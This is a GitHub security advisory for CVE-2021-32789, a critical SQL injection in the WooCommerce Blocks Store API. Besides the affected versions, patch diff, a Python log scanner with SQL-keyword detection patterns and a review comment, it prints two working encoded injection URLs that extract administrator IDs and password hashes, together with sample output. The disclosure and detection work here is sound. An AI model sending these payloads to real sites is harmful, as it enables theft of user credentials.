This repository was archived by the owner on Feb 23, 2024. It is now read-only.

Arbitrary SQL (SQL injection) possible via the Store API component.

Critical
nerrad published GHSA-6hq4-w6wv-8wrp Jul 23, 2021

Package

composer woocommerce/woocommerce-blocks (Composer)

Affected versions

>= 2.5.0

Patched versions

5.5.1, 5.4.1, 5.3.2, 5.2.1, 5.1.1, 5.0.1, 4.9.2, 4.8.1, 4.7.1, 4.6.1, 4.5.3, 4.4.3, 4.3.1, 4.2.1, 4.1.1, 4.0.1, 3.9.1, 3.8.1, 3.7.2, 3.6.1, 3.5.1, 3.4.1, 3.3.1, 3.2.1, 3.1.1, 3.0.1, 2.9.1, 2.8.1, 2.7.2, 2.6.2, 2.5.16

Description

Impact

This affects all WooCommerce sites running version 2.5.0 or later of the WooCommerce Blocks feature plugin. Via a carefully crafted URL, an attacker can reach the wc/store/products/collection-data?calculate_attribute_counts[][taxonomy] endpoint with input that results in the execution of a read-only SQL query.

  1. SQL formed to list the IDs of any administrator-level user:
/wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=%252522%252529%252520union%252520all%252520SELECT%2525201%25252Cuser_id%252520FROM%252520wp_usermeta%252520WHERE%252520meta_value%252520LIKE%252520%252527%252525Administrator%252525%252527%25253b%252500
  2. User-specific query to retrieve the associated database fields, including the hashed password:
/wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252Cuser_login%25252C0x3a%25252Cuser_email%25252C0x3a%25252Cuser_pass%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500

Supporting Material/References:
Query 1 returns:

{"price_range":null,"attribute_counts":[{"term":0,"count":0},{"term":1,"count":1}],"rating_counts":null}

Query 2 returns:

{"price_range":null,"attribute_counts":[{"term":0,"count":0},{"term":"1:admin:**.com:$P$B.CZdnSLBmrCAURGHLO8pA2OoHdDoo0","count":1}],"rating_counts":null}
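
As an added detection example, not part of the advisory or of the WooCommerce Blocks code: the script below scans web-server access-log lines for requests to the collection-data endpoint and percent-decodes the calculate_attribute_counts[][taxonomy] value until it stops changing, because the proof-of-concept URLs above are encoded several layers deep and a check that decodes only once sees nothing alarming. The combined log format, the sample lines and the 5-round decode limit are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Store API endpoint and query parameter named in the advisory.
ENDPOINT = "/wp-json/wc/store/products/collection-data"
PARAM = "calculate_attribute_counts[][taxonomy]"
# A legitimate taxonomy name never contains quotes, parentheses, NULs or SQL verbs.
SUSPICIOUS = re.compile(r"""["'()\x00]|\bunion\b|\bselect\b""", re.IGNORECASE)
# Combined access-log format (assumed); only the fields used below are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<path>\S+) [^"]*" \d{3}')

def fully_decode(value, max_rounds=5):
    """Percent-decode until the text stops changing; return (text, rounds removed).
    One decode is not enough: the PoC URLs are encoded several layers deep, so a
    check that decodes once sees only harmless-looking text."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def taxonomy_values(path):
    """Return the raw taxonomy filter values of a request to the endpoint."""
    parts = urlsplit(path)
    if not parts.path.startswith(ENDPOINT):
        return []
    return parse_qs(parts.query, keep_blank_values=True).get(PARAM, [])

def scan_log(lines):
    """Return one finding per request whose decoded taxonomy value looks like SQL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for raw in taxonomy_values(m.group("path")):
            decoded, extra = fully_decode(raw)  # parse_qs already removed one layer
            if SUSPICIOUS.search(decoded):
                findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                                 "decoded": decoded, "encoding_layers": extra + 1})
    return findings

# Constructed sample log lines (not real traffic): a normal filter, an unrelated request, and a triple-encoded probe.
SAMPLE_LOG = [
    '198.51.100.7 - - [23/Jul/2021:09:58:01 +0000] "GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=pa_color HTTP/1.1" 200 184',
    '198.51.100.7 - - [23/Jul/2021:09:58:02 +0000] "GET /wp-json/wc/store/cart HTTP/1.1" 200 512',
    '203.0.113.5 - - [23/Jul/2021:10:00:00 +0000] "GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=%252522%252529%252520union%252520select%2525201 HTTP/1.1" 200 120',
]
```

Running `scan_log(SAMPLE_LOG)` flags only the third line, reporting three encoding layers and the decoded value `") union select 1`.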

Patches

diff --git a/src/StoreApi/Utilities/ProductQueryFilters.php b/src/StoreApi/Utilities/ProductQueryFilters.php
index d8ebb765..bd3038ac 100644
--- a/src/StoreApi/Utilities/ProductQueryFilters.php
+++ b/src/StoreApi/Utilities/ProductQueryFilters.php
@@ -83,7 +83,13 @@ class ProductQueryFilters {
                        $attributes = array_map( 'wc_attribute_taxonomy_name_by_id', wp_parse_id_list( $attributes ) );
                }
   
-               $attributes_to_count     = array_map( 'wc_sanitize_taxonomy_name', $attributes );
+               $attributes_to_count     = array_map(
+                       function( $attribute ) {
+                               $attribute = wc_sanitize_taxonomy_name( $attribute );
+                               return esc_sql( $attribute );
+                       },
+                       $attributes
+               );
                $attributes_to_count_sql = 'AND term_taxonomy.taxonomy IN ("' . implode( '","', $attributes_to_count ) . '")';
                $attribute_count_sql     = "
                        SELECT COUNT( DISTINCT posts.ID ) as term_count, terms.term_id as term_count_id
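
Review bot: esc_sql() on each attribute only escapes quote characters in a string that is still spliced into SQL by concatenation on the line that follows (`implode( '","', $attributes_to_count )` inside `IN ("...")`); building that IN list with $wpdb->prepare() placeholders would stop treating user-supplied taxonomy names as SQL text at all, rather than relying on escaping. If esc_sql() stays, the order shown here is the right one and must be preserved: sanitize with wc_sanitize_taxonomy_name() first, escape last, with no further decoding or sanitizing step between the escape and the concatenation, since such a step would undo the escaping. A regression test that feeds a multiply percent-encoded calculate_attribute_counts[][taxonomy] value (as in the proof-of-concept URLs above) through this path would pin that behaviour.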

Severity

Critical

CVE ID

CVE-2021-32789

Weaknesses

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.